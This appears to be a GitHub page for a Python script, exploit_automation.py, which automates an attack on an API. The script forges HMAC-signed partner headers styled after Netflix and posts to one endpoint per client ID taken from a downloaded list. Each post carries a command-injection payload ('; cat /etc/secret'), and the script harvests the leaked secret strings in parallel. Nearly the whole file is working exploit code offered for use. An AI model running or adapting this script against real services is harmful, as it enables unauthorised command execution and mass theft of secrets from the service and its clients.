-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit_automation.py
224 lines (199 loc) · 8.13 KB
/
exploit_automation.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
import concurrent.futures
import hashlib
import hmac
import os
import re
import sys
from datetime import datetime
from typing import List, Set, Tuple, Dict
from uuid import uuid4
import click
from requests import Response, Session
from requests.exceptions import ConnectTimeout, ReadTimeout, RequestException, \
TooManyRedirects
from config import Config
from read_file_chunk_by_chunk import gen_chunks
class ExploitAutomation:
def __init__(self):
self.log_url: str = Config.LOG_URL
self.affected_url: str = Config.AFFECTED_URL
self.open_connections: int = Config.OPEN_CONNECTIONS
self.size: int = 0
def download_client_accounts_to_file(self) -> str:
local_file_name: str = "".join([self.log_url.split("/")[-1], ".txt"])
try:
os.mkdir("files")
except FileExistsError:
pass
except OSError as error:
print(f"{error}")
sys.exit(1)
local_file_name = os.path.join("files", local_file_name)
with Session() as session:
res: Response = session.get(self.log_url, stream=True)
res.raise_for_status()
with open(local_file_name, "wb") as fd:
for chunk in res.iter_content(8192, decode_unicode=True):
fd.write(chunk)
return local_file_name
def get_all_client_ids_from_file(self) -> List[str]:
client_ids: Set[str] = set()
filename: str = self.download_client_accounts_to_file()
for chunk in gen_chunks(filename):
for client_id in chunk:
client_ids.add(client_id.strip())
return list(client_ids)
def create_batch_files(self, filename: str) -> List[str]:
file_names: List[str] = list()
client_ids: List[str] = self.get_all_client_ids_from_file()
length: int = len(client_ids)
self.size = length
file_sizes: List[int] = [0 for _ in range(self.open_connections)]
for i in range(length):
file_sizes[i % self.open_connections] += 1
for i in range(1, self.open_connections):
file_sizes[i] = file_sizes[i - 1] + file_sizes[i]
for i in range(self.open_connections):
out_file: str = "".join(
[
filename.split(".")[0],
"-",
str(i),
".",
filename.split(".")[1]
]
)
out_file = os.path.join("files", out_file)
file_names.append(out_file)
with open(out_file, "w") as fd:
low: int = 0 if i == 0 else file_sizes[i - 1]
high: int = file_sizes[i]
for index in range(low, high):
fd.write(client_ids[index])
fd.write(os.linesep)
return file_names
def prepare_headers(self) -> Tuple[str, str, str]:
# X-Netflix-AuthorizationTime
curr_dt: datetime = datetime.now()
timestamp: int = int(round(curr_dt.timestamp()))
# X-Netflix-PartnerName
partner_key: str = Config.PARTNER_KEY
# X-Netflix-Session
cid: str = str(uuid4())
return timestamp, partner_key, cid
def sign_headers(self, headers: Tuple[str, str, str]) -> str:
# X-Netflix-HeaderSignature
headers_dict: Dict[str, str] = dict()
headers_dict["x-netflix-authorizationtime"] = headers[0]
headers_dict["x-netflix-partnername"] = headers[1]
headers_dict["x-netflix-session"] = headers[2]
headers_str: str = ""
for key, value in headers_dict.items():
headers_str = "".join([headers_str, key, "=", str(value), ","])
headers_str: str = headers_str[:-1]
sig: str = hmac.new(
str(Config.HMAC_KEY).encode("utf-8"),
msg=headers_str.encode("utf-8"),
digestmod=hashlib.sha256
).hexdigest()
return sig
def compile_headers_payload(self) -> Tuple[Dict[str, str], str]:
batch_file: str = Config.BATCH_FILE
headers: Tuple[str, str, str] = self.prepare_headers()
cid: str = headers[2]
signature: str = self.sign_headers(headers)
# headers
headers_dict: Dict[str, str] = {
# "Content-Length": 63555,
"X-Netflix-AuthorizationTime": str(headers[0]),
"X-Netflix-PartnerName": headers[1],
"X-Netflix-Session": cid,
"X-Netflix-HeaderSignature": signature
}
# payload
payload: str = ""
payload = "".join([payload, "cid", "=", str(cid), "&"])
payload = "".join([payload, "batch", "=", batch_file, ";"])
payload = "".join([payload, " ", "cat", " ", "/etc/secret"])
return headers_dict, payload
def find_exploits(self, file_names: List[str]) -> List[str]:
result: List[str] = list()
with concurrent.futures.ProcessPoolExecutor(
max_workers=self.open_connections
) as executor:
for filename, ids in zip(
file_names, executor.map(
self.run_exploit, file_names
)
):
if ids:
result.extend(ids)
return result
def run_exploit(self, filename: str) -> List[str]:
result: List[str] = list()
with open(filename, "r") as fd:
while True:
client_id: str = fd.readline().strip()
if not client_id:
break
exploit_url: str = "".join(
[
self.affected_url,
"/",
"clients",
"/",
str(client_id)
]
)
(headers_dict, payload) = self.compile_headers_payload()
# Make requests to the affected URL
with Session() as session:
try:
resp: Response = session.post(
exploit_url,
data=payload,
headers=headers_dict,
stream=True,
timeout=Config.REQUEST_TIMEOUT,
)
except ConnectTimeout:
print(f"{exploit_url} request timed out! Skip.")
continue
except ReadTimeout:
print(f"{exploit_url} request read timed out! Skip.")
continue
except RequestException:
print(f"{exploit_url} request exception! Skip.")
continue
except TooManyRedirects:
print(
f"{exploit_url} request has too many redirects! Skip."
)
continue
resp_content: str = resp.content.decode("utf-8")
if resp.status_code == 200 and (
"cat /etc/secret" not in resp_content.lower()):
substring: str = resp_content.split()[-1]
if 30 <= len(substring) <= 50 and re.match(
"^\w+$", substring
):
result.append(
"".join([client_id, ": ", substring])
)
return result
@click.command()
def cli():
exploit: ExploitAutomation = ExploitAutomation()
start_time: datetime = datetime.utcnow()
click.echo(f"Start time: {start_time.strftime('%m-%d-%Y %H:%M:%S')}")
file_names: List[str] = exploit.create_batch_files(Config.BATCH_FILE)
ids: List[str] = exploit.find_exploits(file_names)
end_time: datetime = datetime.utcnow()
click.echo(f"End time: {end_time.strftime('%m-%d-%Y %H:%M:%S')}")
click.echo(f"Elapsed runtime in seconds: {end_time - start_time}")
click.echo(
f"The number of clients that were active in last year: {exploit.size}"
)
for id in ids:
if id:
click.echo(f"{id}")